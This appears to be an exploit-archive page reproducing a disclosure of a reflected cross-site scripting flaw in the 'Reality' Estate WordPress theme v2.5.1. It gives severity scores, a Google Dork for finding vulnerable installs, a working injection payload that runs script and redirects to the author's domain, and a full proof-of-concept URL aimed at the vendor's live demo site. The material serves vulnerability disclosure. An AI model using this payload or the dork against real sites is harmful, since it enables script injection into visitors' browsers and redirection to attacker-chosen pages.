Advertisement






Reality | Estate Multipurpose WordPress Theme v2.5.1 Reflected XSS

CVE Category Price Severity
CWE-79 Unavailable Medium
Author Risk Exploitation Type Date
Unknown High Remote 2020-01-16
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N 0.04378 0.6048

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020010128

Below is a copy:

Reality | Estate Multipurpose WordPress Theme v2.5.1 Reflected XSS
# Exploit Title: Reality | Estate Multipurpose WordPress Theme v2.5.1 Reflected XSS
# Google Dork: /wp-content/themes/reality/
# Date: 13/01/2020
# Exploit Author: m0ze
# Vendor Homepage: https://inwavethemes.com/
# Software Link: https://themeforest.net/item/reality-real-estate-wordpress-theme/21627776
# Version: 2.5.1
# Tested on: Kali Linux
# CVE: -
# CWE: 79


----[]- Info: -[]----
Demo website: http://reality.inwavethemes.com/


----[]- Reflected XSS: -[]----
Payload Sample: "><img src=x onerror=(alert)(`m0ze`);window.location=`https://m0ze.ru`;//">

PoC: http://reality.inwavethemes.com/properties/?status=&keyword=%22%3E%3Cimg%20src=x%20onerror=(alert)(`m0ze`);window.location=`https://m0ze.ru`;//%22%3E&type=&from-year=&to-year=&min-price=&max-price=&bathrooms=&bedrooms=&garages=&min-garages_size=&max-garages_size=&min-land_size=&max-land_size=

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum